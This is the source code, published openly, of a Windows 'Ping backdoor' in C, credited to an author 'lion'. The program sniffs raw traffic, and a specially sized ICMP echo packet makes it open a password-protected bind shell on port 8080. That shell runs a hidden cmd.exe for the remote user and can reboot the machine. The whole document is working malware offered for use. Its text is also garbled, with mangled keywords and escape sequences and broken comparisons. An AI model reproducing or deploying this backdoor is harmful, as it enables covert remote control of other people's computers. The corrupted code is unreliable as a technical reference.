Pingback backdoor (source code)

# Include <stdio. h>
# Include <stdlib. h>
# Include <winsock2.h>
// # Include <ws2tcpip. h>
# Include <mstcpip. h>

# Define ICMP_Echo 8 // The type of ICMP echo request message is 8
# Define ICMP_ECHOREPLY 0 // The type value of the ICMP echo response packet is 0
# Define sniffer_icmp_size 101 // large for listening to ICMP packets?
# Define bind_port 8080 // default bind shell Port
# Define max_packet 10000 // What is the maximum ICMP packet size?
# Define def_password "givemeshell! "// Default password

# Define xmalloc (s) heapalloc (getprocessheap (), heap_zero_memory, (s ))

// Define the IP Header
Typedef struct iphdr
{
Unsigned char h_verlen; // 4-bit header length, 4-bit IP address version 1
Unsigned char TOS; // 8-bit service type TOS 1
Unsigned short total_len; // The total length of 16 bits (in bytes) 2
Unsigned short ident; // 16-bit ID 2
Unsigned short frag_and_flags; // 3-digit flag 2
Unsigned char TTL; // 8-bit TTL 1
Unsigned char proto; // 8-bit protocol (TCP, UDP, or other) 1
Unsigned short checksum; // 16-bit IP header checksum 2
Unsigned int sourceip; // 32-bit source IP address 4
Unsigned int destip; // 32-bit destination IP address 4
} Ipheader; // IP header length: 20

// Define the ICMP Header
Typedef struct _ ihdr
{
Unsigned char I _type; // 8-bit type 1
Unsigned char I _code; // 8-bit code 1
Unsigned short I _cksum; // 16-bit checksum and 2
Unsigned short I _id; // identification number (identified by process number) 2
Unsigned short I _seq; // message serial number 2
} Icmpheader; // ICMP Header Length: 8

Int sniffer (); // listen to ICMP?
Void decode_sniffer (char *, Int, struct sockaddr_in *); // simple sniffer unpacking program
Int bindshell (); // bind Shell

DWORD dwbufferlen [10];
DWORD dwbufferinlen = 1;
DWORD dwbytesreturned = 0;
Handle bindthread;

// Main icmpdoor Function
Int main (INT argc, char ** argv)
{
Wsadata;
Int retval;

// Socket Initialization
If (retval = wsastartup (makeword (2, 2), & wsadata ))! = 0)
{
Printf ("wsastartup failed: % d/N", retval );
Exit (-1 );
}

// Start sniffer
Sniffer ();

// Socket ends
Wsacleanup ();
Return 0;
}

// Main function of sniffer
Int sniffer ()
{
Int packsize = sniffer_icmp_size;
Socket socksniffer;
Struct sockaddr_in DEST, from;
Struct hostent * HP;
Int sread;
Int fromlen = sizeof (from );
Unsigned char localname [256];
Char * recvbuf;

// Create an original socket to accept all received packets (sniffer)
If (socksniffer = wsasocket (af_inet, sock_raw, ipproto_ip, null, 0, wsa_flag_overlapped) = invalid_socket)
{
Printf ("wsasocket () failed: % d/N", wsagetlasterror ());
Return-1;
}

// Obtain the local address
Gethostname (char *) localname, sizeof (localname)-1 );
If (HP = gethostbyname (char *) localname) = NULL)
{
Return-1;
}
Memset (& DEST, 0, sizeof (DEST ));
Memcpy (& DeST. sin_addr.s_addr, HP-> h_addr_list [0], HP-> h_length); // TCP sniffing options
DeST. sin_family = af_inet;
DeST. sin_port = htons (8000); // specify any port
// Socket bind
BIND (socksniffer, (psockaddr) & DEST, sizeof (DEST ));

// Set socket to accept all packets
Wsaioctl (socksniffer, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen), & dwbufferlen,

Sizeof (dwbufferlen), & dwbytesreturned, null, null );

// Allocate the socket receiving buffer size to max_packet
Recvbuf = (char *) xmalloc (max_packet );

Printf ("sniffer OK! ");

// The size of the loop listener package
While (1)
{
// Read data
Sread = recvfrom (socksniffer, recvbuf, max_packet, 0, (struct sockaddr *) & from, & fromlen );

// If an error occurs while reading data
If (sread = socket_error | sread <0)
{
If (wsagetlasterror () = wsaetimedout)
{
Continue;
}
Printf ("recvfrom failed: % d/N", wsagetlasterror ());
Return-1;
}
Else
// If (sread> = 28)
// If the size of the read data = the size of the listener package + 28
If (sread = packsize + 28)
{
// Send the received data to the sniffer unpacking program for processing.
Decode_sniffer (recvbuf, sread-28, & from );
}
}
Return 1;
}

// Simple sniffer unpacking program
Void decode_sniffer (char * Buf, int bytes, struct sockaddr_in * From)
{
Icmpheader * icmphdr;

// The ICMP header address equals the length of the BUF + IP header: BUF + 20
Icmphdr = (icmpheader *) (BUF + sizeof (ipheader ));

/*
Printf ("/R/n % d bytes from % s,", bytes, inet_ntoa (from-> sin_addr); // retrieve the received data
Printf ("icmp_type: % d", icmphdr-> I _type); // check type
Printf ("icmp_seq: % d/R/N", icmphdr-> I _seq); // retrieve the serial number

//? Outbound data segment BUF + 28 + I
For (INT I = 0; I <bytes-1; I ++)
{
Printf ("% C", * (BUF + sizeof (ipheader) + sizeof (icmpheader) + I ));
}
*/

// If (icmphdr-> I _type = ICMP_Echo | icmphdr-> I _type = ICMP_ECHOREPLY)
// Determine if the packet is an ICMP request packet
If (icmphdr-> I _type = ICMP_Echo)
{
// Bind Shell
Bindshell ();

// DWORD bid;
// Bindthread = createthread (null, 0, bindshell, 0, 0, & bid );
}
Else
Printf ("/R/n get other packets! ");

Return;
}

// Bind shell function
Int bindshell (){
Int bport = bind_port;
Socket bindserver, getclient;
Struct sockaddr_in addrserver, addrclient;
Char buff [4096];
Char * messages = "/R/n ====================== Ping backdoor v0.1 ==== =================================/R/n =========== code by lion.

Welcome to http: // www.cnhonker.net ========/R/N ";
Char * getpass = "/R/n your password :";
Char * passok = "/R/n OK! Please enter :";
Char * nothispass = "/R/n sorry, your password not right./R/N ";
Char * exitok = "/R/n exit OK! /R/N ";
Char * rebootok = "/R/n reboot now! /R/N ";

// Create a socket
Bindserver = socket (af_inet, sock_stream, ipproto_tcp );

// Specify the server address and port
Addrserver. sin_family = af_inet;
Addrserver. sin_port = htons (bport );
Addrserver. sin_addr.s_addr = addr_any;

// Set timeout
Int timeout = 60000;
Setsockopt (bindserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));

// Set the reuse Port
Uint breuser = 1;
Setsockopt (bindserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));

// Listening port
BIND (bindserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));
Listen (bindserver, 2 );

Printf ("/R/n bind port on % d OK.", bport );

// Accept client connection
Int ilen = sizeof (addrclient );

// Receives one connection
Getclient = accept (bindserver, (struct sockaddr *) & addrclient, & ilen );

If (getclient! = Invalid_socket)
{
// If there is a connection, set the delay to 60 s.
Int itimeout = 60000;
Setsockopt (getclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));
}
Else
Return-1;

// Write welcome information
Send (getclient, messages, strlen (messages), 0 );

// WRITE password verification information
Send (getclient, getpass, strlen (getpass), 0 );

// Receive data
Recv (getclient, buff, 0 );

// Verify the password
If (! (Strstr (buff, def_password )))
{
// If the password is incorrect, write the Password error message
Send (getclient, nothispass, strlen (nothispass), 0 );
Printf ("/R/n password not right! ");
Closesocket (getclient );
Closesocket (bindserver );
Return-1;
}

// Write verification information
Send (getclient, passok, strlen (passok), 0 );

// Create two anonymous Pipelines
Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;
Unsigned long lbytesread;

Security_attributes SA;

SA. nlength = 12;
SA. lpsecuritydescriptor = 0;
SA. binherithandle = true;

Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );
Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );

Startupinfo siinfo;
Char character line [] = "cmd.exe ";
Process_information processinformation;

Zeromemory (& siinfo, sizeof (siinfo ));
Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Siinfo. wshowwindow = sw_hide;
Siinfo. hstdinput = hreadpipe2; // read the data written by the socket to pipe2
Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1; // write data here

Printf ("/R/n pipe create OK! ");

// Create a cmd process that reads data from hreadpipe2 and writes data to hwritepipe1
Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );

While (1)
{
// Check whether data is returned in the MPs queue
Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );

If (lbytesread)
{
// Read data from the pipeline hreadpipe1
Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );
If (! RET) break;

// Write the data read from the pipeline hreadpipe1 to the getclient
Ret = Send (getclient, buff, lbytesread, 0 );
If (Ret <= 0) break;
}
Else
{
// If the getclient connection receives data
Lbytesread = Recv (getclient, buff, 1024,0 );
If (lbytesread <= 0) break;

// Write the data read from the getclient connection to hwritepipe2
Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );

If (lbytesread> 4 & buff [0] = 'E' & buff [1] = 'X' & buff [2] = 'I '&& buff [3] = 'T ')
{
// Write and exit Information
Send (getclient, exitok, strlen (exitok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Return 1;
}
Else if (lbytesread> 6 & buff [0] = 'R' & buff [1] = 'E' & buff [2] = 'B '& & buff [3] = 'O '&&

Buff [1] = 'O' & buff [2] = 'T ')
{
// Write restart
Send (getclient, rebootok, strlen (rebootok), 0 );
Closesocket (getclient );
Closesocket (bindserver );
Exitwindowsex (ewx_reboot, null );
Return 1;
}

If (! RET) break;
}
}

Closesocket (getclient );
Closesocket (bindserver );
Return 1;
}